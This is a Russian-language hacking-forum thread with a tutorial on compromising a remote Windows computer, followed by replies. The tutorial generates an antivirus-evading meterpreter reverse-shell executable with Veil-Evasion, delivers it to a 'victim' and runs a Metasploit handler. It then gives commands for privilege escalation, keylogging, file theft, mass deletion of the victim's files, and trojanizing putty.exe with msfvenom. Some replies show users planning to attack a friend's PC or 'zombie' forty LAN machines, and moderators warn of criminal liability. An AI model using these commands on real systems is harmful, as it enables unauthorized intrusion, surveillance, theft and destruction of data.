Статья Взлом удаленного компьютера, Veil-Evasion, Metasploit

В этой статье, будет подробно описан взлом удаленного компьютера с использованием Kali Linux, Veil-Evasion, Metasploit.

UPDATE:
Поддержка Veil-Evasion закончилась, рекомендуется использовать фреймворк Veil.
https://codeby.net/threads/veil-framework.60978/


Ниже представлена схема, по которой будет осуществляться проникновение.

upload_2016-7-26_15-33-33.png


Необходимые ресурсы:
1. Kali Linux (Я использовал Kali GNU/Linux Rolling)

2. Статический белый IP (В моем случае Kali находится за NAT роутера с статическим адресом. Подключение к нашей машине извне будут идти на 443 порт. (В роутере он проброшен на локальный адрес Kali.) Использующие динамический адрес могут использовать DyDNS. (Не пробовал, но должно работать)
3. Veil-Evasion – фреймворк, с помощью которого мы попытаемся обойти антивирус, создадим файл с полезной нагрузкой в формате .exe.

Для начала необходимо установить Veil-Evasion. Чтобы программа создавала корректно работающие файлы, не рекомендую установку apt-get install Veil-Evasion. Фреймворк нужно клонировать c github.com.
Выполните в терминале следующее:
Код:
apt-get -y install git
git clone https://github.com/Veil-Framework/Veil-Evasion.git
cd Veil-Evasion/
cd setup
setup.sh -c
Следим за установкой, соглашаемся и все устанавливаем.

Запускаем файл Veil-Evasion.py из терминала или из папки /root/Veil-Evasion.

upload_2016-7-26_15-34-5.png


Далее вводим команду list – она покажет список доступных payload.

upload_2016-7-26_15-34-57.png


Нас интересует номер 32python/meterpreter/reverse_https

Вводим - use 32

upload_2016-7-26_15-35-15.png


Задаем опции будущему файлу, вводим последовательно следующие команды:

set LHOST 83.199.12.XXX (Ваш публичный IP)

set LPORT 443 (По умолчанию HTTPS URL использует 443 TCP-порт (для незащищённого HTTP — 80).

set USE_PYHERION Y (используем энкриптор)

generate (создаем .exe файл)

Вводим имя создаваемого файла.

Выбираем вторую строку, жмем 2.

upload_2016-7-26_15-35-36.png


Ждем успешной генерации файла.

upload_2016-7-26_15-35-57.png


Созданный файл любым путем доставляем на компьютер жертвы. Весит немного, стандартными антивирусами Win7, Win8.1, Win10 не определялся.

Выходим из Veil-Evasion.

Запускаем Metasploit.
#msfconsole

Далее
Код:
msf > use multi/handler
msf exploit (handler) > set payload windows/meterpreter/reverse_https
msf exploit (handler) > set LHOST (свой внутренний IP)
msf exploit (handler)  > set LPORT 443
msf exploit (handler) >exploit
Когда файл на компьютере жертвы будет запущен, вы увидите что открылась сессия meterpreter>.

upload_2016-7-26_15-37-23.png


Сразу советую мигрировать в другой процесс т.к. файл могут удалить, процесс завершится и т.д.

Делается это так, вводим:
ps – отобразится список активных процессов. Находим , например, explorer, смотрим его PID.

migrate (PID процесса).
Migration completed successfully.
Успех. Теперь необходимо повысить права в системе, команда:
getsystem (срабатывает не всегда.)
В целом поможет разобраться стандартная команда help.
Ниже пару моментов которые помогут быстрее освоиться в системе.

1. Кейлоггер
meterpreter > bgrun keylogrecorder

[*] Executed Meterpreter with Job ID 2
meterpreter > [*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/logs/scripts/keylogrecorder/192.168.ххх.ххх_20111024.4455.txt #адрес лога
[*] Recording

meterpreter > bgkill 2 #отключаем кейлогер
[*] Killing background job 2...

2. Скрипт File_collector – позволит создавать список файлов имеющихся в определенном каталоге компьютера жертвы, редактировать его, и скачивать интересующие файлы себе.
Пример:
meterpreter > run file_collector -h
Затем создаем список файлов в одном каталоге:

run file_collector -r -d e:\\ -f * -o /root/ file.txt


Редактируем наш выходной файл, т.к. не все файлы нужны.
cat /root/file.txt | grep -v \DDD | grep -v \GCC | grep -v \GDB | grep -v \MAKE > file.lst


Скачиваем файлы на свой компьютер.

run file_collector -i /root /file.lst -l /root/

Полагаю не нужно обьяснять, что делают скрипты upload и download)

3. Используя скрипты scrapper и winenum можно собрать информацию о системе, которая сохранится на вашем локальном компьютере.

4. Удаление файлов. Команды вводятся в шелле.
Получаем его слудующим образом:
meterpreter >shell

Удаление файлов exe:
del e:\*.* /f /s /q

удаление файлов doc:
del e:\*.doc /f /s /q


удаление файлов pdf:
del e:\*.pdf /f /s /q


5. Командой приведенной ниже можно добавить payload в любой файл (определяется некоторыми антивирусами) При запуске на компьютере жертвы, откроется сессия meterpreter.

msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o puttyX.exe

Краткое пояснение аргументов команды:
- a 86 - архитектура процессора.
--platform windows - тут понятно.
- x - указать пользовательский исполняемый файл для использования в качестве шаблона.
- k - сохранить поведение шаблона и ввести полезную нагрузку как новый поток.
- p - тип полезной нагрузки.
- e - тип енкодера.
- b - помечаем нулевой байт «плохим», то есть говорим, что его нужно избегать.
- f - формат выходного файла.

За пример взята putty находящаяся в директории /root.
LHOST и LPORT указываем свои.

Приведенный метод, хорошо справляется с взломом Win7, Win8, Win10, вопросы жду в комментариях. Если кто-то умеет криптовать файлы, интересно услышать его мнение.
 
Последнее редактирование:

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
Это виндовс 7 , моего друга, как проверить на уязвимость ???? или каким учплоидом атаковать???

Если говорить о проверке снаружи - сканер сетевой, можно установить сервисы (порты) на них поискать эксплоиты (шанс очень маленький говоря про дефолтную стандартную систему), о проверке внутри системы, есть ряд комплексов, достаточно посмотреть какие обновления установлены, какой антивирус стоит, от какого числа базы,как настроен фаэрвол.
Вам все равно каким атаковать? ну возьмите аналог hddkill. Перед проведением тестирования - следует определиться ЦЕЛЬ то какая?
 
F

for(i=0;i<225;i++);

Если говорить о проверке снаружи - сканер сетевой, можно установить сервисы (порты) на них поискать эксплоиты (шанс очень маленький говоря про дефолтную стандартную систему), о проверке внутри системы, есть ряд комплексов, достаточно посмотреть какие обновления установлены, какой антивирус стоит, от какого числа базы,как настроен фаэрвол.
Вам все равно каким атаковать? ну возьмите аналог hddkill. Перед проведением тестирования - следует определиться ЦЕЛЬ то какая?
Цель: нашалить:) Я с уважением отношусь к вам,Я жи прошу вас написать какой программой проверить уязвимость этого порта, системы, Помогите??здесь на форуме кто нибудь обитает:(
 

Сергей Попов

Кодебай
30.12.2015
4 723
6 709
BIT
390
Цель: нашалить:) Я с уважением отношусь к вам,Я жи прошу вас написать какой программой проверить уязвимость этого порта, системы, Помогите??здесь на форуме кто нибудь обитает:(
Нарушение правил публикации сообщений. Аккаунт переведен в режим "только чтение" на 24 часа.
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
акой программой проверить уязвимость этого порт

1) Порт - смотрим весрию ПО на данном порте далее читаем ленту бак-трака и смотрим в базе эксплоитов. Используем поисковую систему

2) Сканер безопаности - в Вашем случае я бы рекомендовал XSpider.....
 
D

Darwin_Douglas

Если о железе как о системе - тут любой комп боле менее современный подойдет, карта Wi-Fi тут не играет ключеовой роли, роутер - так же можно почти любой домашний настроить. Или какое то еще железо?
ну раз не играет, то отлично, это меня и интересовало
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
Просьба на будущее, тем, кто будет отписываться ЗАРАБОТАЛО, ВСЕ ПОЛУЧИЛОСЬ, ЗАПУСТИЛ и т.д - пишите что именно Вы делали и какой результат получился, желательно скрины приложить. Это будет полезным вкладом для других участников форума.
 
  • Нравится
Реакции: Vander

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
Просьба на будущее, тем, кто будет отписываться ЗАРАБОТАЛО, ВСЕ ПОЛУЧИЛОСЬ, ЗАПУСТИЛ и т.д - пишите что именно Вы делали и какой результат получился, желательно скрины приложить. Это будет полезным вкладом для других участников форума.
Да, @ghostphisher очень верно подметил, не набивайте кол-во постов такими фразами, раскрывайте смысл проделанного.
P.S. Односложные комменты тереть буду.
 
  • Нравится
Реакции: ghostphisher

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
всем привет друзья ! есть у меня локалка с 40 еом подключенних через tp linkпланирую зомбить их с помощю veil-evasion.може кто че посоветует для акуратности начинающему

Если локалка не Ваша и системы тоже не Ваши, Ваши действия попадауют под УК РФ. Злоумышленник в локалке, обычно сркывается меняя IP и MAC адрес своего устройства.
 
A

afalin

благодарка калі на флешке. загружаюсь с рабочей машины .сгенерирую метерпретер и попробую інєкцию с помощю intercepter ng ну и поищу прогу емуляции мака и ip но ет так теория . буду рад если будете подсказки давать
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
1) Вы хотите провести тестирование в локальной сети с другими системами. Верно?
2) Подход верный с Intercepter, однако его стабильность в Kali под вопросом
3) Эмуляции IP - не реально, IP выдается головным сетевым устройством ( роутером/маршрутизатором ), либо, если такая есть возможность, можно указать IP самому, но в том диапазоне, который действует в этой сети. МАК сменить можно на любой
4)Подумайте над дргуим вопросом - если Вы будете одновременно тестировать несколько систем через один файл созданный Veil, то и порт будет у Вас один на всех, а это не есть хорошо.
 
A

afalin

за порт понял. прорабатую план. спасибо за подсказку . но вот проблемка странная возникла помогите понять
Failed to install Wine... Exit code: 100
Failed to install dependencies... Exit code: 100
Failed to install dependencies (Metasploit-Framework)... Exit code: 100
Failed to install Capstone... Exit code: 100
Failed to install SymmetricJSONRPC... Exit code: 100
Failed to install (Wine) Python 2.7.5... Exit code: 127
Failed to install pywin32-219.win32-py2.7.exe... Exit code: 127
Failed to install pycrypto-2.6.win32-py2.7.exe... Exit code: 127
Failed to install (Wine) Ruby.exe... Exit code: 127
Failed to install (Wine) Ruby OCRA Gem... Exit code: 127
Bad hash for go153x64.tar.gz!


If you have any errors running Veil-Evasion, delete the Veil Wine profile ('rm -rf /root/.config/wine/veil') and re-run: '/root/Veil-Evasion/setup/setup.sh -c'
система Kali GNU/Linux Rolling 64-bit не обновлялся после установки
 
С

сергей799

root@Poteh799:~# git clone https://github.com/Veil-Framework/Veil-Evasion.git
Клонирование в «Veil-Evasion»…
remote: Counting objects: 3786, done.
remote: Total 3786 (delta 0), reused 0 (delta 0), pack-reused 3786
Получение объектов: 100% (3786/3786), 241.89 MiB | 289.00 KiB/s, готово.
Определение изменений: 100% (2125/2125), готово.
Проверка соединения… готово.
Распаковка файлов: 100% (313/313), готово.
root@Poteh799:~# cd Veil-Evasion/
root@Poteh799:~/Veil-Evasion# cd setup
root@Poteh799:~/Veil-Evasion/setup# setup.sh -c
bash: setup.sh: команда не найдена
root@Poteh799:~/Veil-Evasion/setup#
В ЧЕМ ОШИБКА
[doublepost=1484998270,1484997636][/doublepost] Kali Linux "2016.1" i686 detected...


[?] Are you sure you wish to install Veil-Evasion?

Continue with installation? ([y]/ilent/[N]o): N

[ERROR]: Installation aborted by user.

root@Poteh799:~/Veil-Evasion/setup#

[doublepost=1484998815][/doublepost]КТО НИБУДЬ ОТВЕТИТ НА МОЮ ОШИБКУ?
 
С

сергей799

Kali Linux "2016.1" i686 detected...


[?] Are you sure you wish to install Veil-Evasion?

Continue with installation? ([y]/ilent/[N]o): N

[ERROR]: Installation aborted by user.

root@Poteh799:~/Veil-Evasion/setup#

[doublepost=1485002781,1485002748][/doublepost]вот что получилось
 

Dosia

Green Team
08.12.2016
96
27
BIT
0
Kali Linux "2016.1" i686 detected...


[?] Are you sure you wish to install Veil-Evasion?

Continue with installation? ([y]/ilent/[N]o): N

[ERROR]: Installation aborted by user.

root@Poteh799:~/Veil-Evasion/setup#

[doublepost=1485002781,1485002748][/doublepost]вот что получилось
Хмммммм, странный вопрос, может надо нажать Y? Не?
 
  • Нравится
Реакции: Dfun
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!